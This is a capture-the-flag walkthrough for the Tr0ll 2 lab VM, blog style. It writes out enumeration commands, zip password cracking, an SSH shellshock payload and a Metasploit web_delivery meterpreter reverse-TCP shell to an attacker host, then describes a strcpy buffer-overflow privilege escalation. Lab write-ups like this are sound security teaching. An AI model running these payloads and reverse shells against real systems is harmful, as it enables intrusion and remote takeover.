Hello
everyone and welcome to this CTF challenge. This is the next part to Tr0ll by
Maleus. You can download the lab from here. The objective of this lab is to get
root and read the flag.
The level of this
challenge is not so tough and its difficulty level is described as
beginner/intermediate.
Penetrating
Methodologies
§ Network scanning (Nmap, Netdiscover)
§ Information Gathering
§ Analysing web source code
§ Get robort.txt
§ Directory enumeration with the help of robots.txt (Dirb)
§ Found encoded answer.txt file
§ Decoding base64 text file
§ FTP login for Zip file
§ Cracking zip file (Fcrackzip)
§ Exploiting shellshock to get shell in bash.
§ Spwan tty shell (Metasploit)
§ Privilege escalation
§ Finding vulnerable binary
§ Finding EIP offset
§ Exploiting buffer overflow
§ Getting root flag
So,
let’s get started!
First step is as
always, IP grabbing. In my case the IP was 192.168.1.131
Next
step was port scanning and discovery of open ports using nmap.
nmap -A 192.168.1.131
And
we found 3 ports open- 21, 22, 80
So,
we tried to open the IP in browser to see what was in the web page and sure as
hell, that troll face again! It really did live up to its name after all!
So,
we opened the home page’s source code using curl:
curl http://192.168.1.131
We,
then enumerated the IP using dirb to find something interesting and something
did catch our eyes—robots.txt
dirb
http://192.168.1.131
So,
we opened robots.txt in web browser and we saw a lot of directory names.
So,
we downloaded robots.txt using wget and tried to make a dictionary out of it in
hope that we find something good in one of them.
wget http://192.168.1.131/robots.txt
nano robots.txt
(Removed
the ‘/’ from each line and saved it)
Enumerating
it again with the custom dictionary we just made, few other directories were
found.
dirb
http://192.168.1.131/robots.txt
So,
we hit each directory on browser and inspected each image since there was
nothing else to play with in the directories.
One
by one we started searching each directory but nothing appealed to us. It all
had the same troll image.
We
checked the source code of the page but nothing seemed good.
Hence,
we downloaded cat_the_troll.jpg from each directory but one such directory
called dont_bother had something interesting in its image.
wget
http://192.168.1.131/dont_bother/cat_the_troll.jpg
We
read the last three lines of the image’s coding using tail command:
tail –n 3 cat_the_troll.jpg
The
code really said to look deep within “y0ur_self” to find the answer. Could it
be a directory? lets find out.
Voila!
It indeed is a directory and really has an answer in it. But on opening answer.txt, the dictionary seemed to be
base64 encoded.
We
again downloaded the answer.txt file using wget and decoded it into a new file decoded.txt
wget
http://192.168.1.131/y0ur_self/answer.txt
Decoded
it using:
base64 –d answer.txt>decoded.txt
Let’s
save this dictionary for future use and move on to another port we
discovered—the FTP port.
We
had no idea of the username and password and neither was there any password or
username file found.
But
remember the very first source code we viewed? It had the author name Tr0ll.
Could
that be the username and default password for FTP?
It
was a complete hit and try method but we successfully got logged in!
ftp
192.168.1.131
ls
get lmao.zip
We
found a zip file “lmao.zip” in FTP. But the zip had password protection.
Wait…
what about the file we just decoded? Could it have password for the zip file?
fcrackzip –u –D –p decoded.txt
lmao.zip
We
found the password!
Let’s
unzip the file now.
unzip lmao.zip
And enter the
password: ItCantReallybeThisEasyRightLOL
We
had high curiosity about the file “noob”.
cat noob
Turned
out, it was an RSA key to SSH
Without
any delay we tried to login to SSH using this RSA key but we got trolled, yet
again!
chmod 600 noob
ssh –i noob noob@192.168.1.131
A
complete arrow in the dark was to exploit shellshock vulnerability in SSH. So,
we tried command:
ssh –i noob noob@192.168.1.131 ‘() ( : ;}; /bin/bash’
And
we got logged in!
id
But
it isn’t a proper teletype. We used web delivery in metasploit to create a
python shell to get a proper meterpreter session.
msf > use multi/script/web_delivery
msf exploit(multi/script/web_delivery)
> set payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery)
> set lhost 192.168.1.132
msf exploit(multi/script/web_delivery)
> set lport 4444
msf exploit(multi/script/web_delivery) > run
We
copied above generated python code to the improper bash we just created.
On
the other hand, we had got a meterpreter session.
sysinfo
Let’s
get into the shell and try to spawn a proper teletype.
shell
python –c “import
pty;pty.spawn(‘/bin/bash’);”
find / -perm -4000 2>/dev/null
The
r00t binary in these directory work differently, and change their behaviour
with each other on every reboot. One of these binary (in our case it was in
door2, it changes on reboot) accept a string as argument and print it.
We
open the binary in gdb debugger to look at the assembly code for the binary. At
main+71 we find a strcpy function, as strcpy function is vulnerable to buffer
overflow we try to exploit it.
First
we create a 500 bytes long string to find the EIP offset using patter_create
script.
./pattern_create.rb -l 500
We
run the file in gdb along with the 500-byte character as the argument and find
that the EIP register was overwritten with 0x6a413969.
We
pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get
an offset of 268. So we need to write 268 characters and then write the address
of the instructions we want to be executed.
./pattern_offset.rb -q 6a413969
After
getting the offset we find the ESP and find it to be 0xbffffc70 but we create
our exploit and execute it we get an error with illegal instruction that is
because gdb has a different environment. Now we remove 1 byte and take the ESP
to be 0xbffffc80. We run the binary by ignoring the environment along the
exploit as the argument. As soon as we run the exploit we get a spawn a shell as
root, we open the /root directory and find a file called Proof.txt. We take a
look at the content of the files and find the final flag.
0 comments:
Post a Comment